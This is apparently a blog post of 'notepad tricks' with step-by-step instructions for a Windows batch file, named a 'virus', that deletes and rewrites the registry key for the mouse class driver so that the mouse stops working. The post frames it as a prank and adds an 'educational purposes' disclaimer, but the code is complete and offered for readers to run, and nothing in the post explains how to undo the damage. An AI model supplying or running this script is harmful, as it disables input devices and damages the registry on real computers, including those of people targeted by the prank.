Create A Virus That Will Disable The Mouse

Make A Virus That Will Disable The Mouse
These days I am experimenting with different notepad tricks. Some of these are just pranks and few of them are those which can be harmful for the PC. Today I will show you a trick by which you will be able to create a virus that will disable the computer mouse.

So before we proceed, you can check some other tricks which I posted recently:
Please note that these tricks are only for the educational purposes. In case of any damage done to your PC, we will not be responsible at all. So you better off use them at your own choice.

So lets start:
  • Open the Notepad
  • Copy the following code and paste it in the notepad.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save the file as "virus.bat" (You can choose whatever name you want instead of virus but make sure to use .bat extension otherwise the trick will not work)
  • Done.
I hope you will learn and get fun with those tricks. If you have some more to add then feel free to share these with us. Have fun :)

Comments

Post a Comment

Popular Posts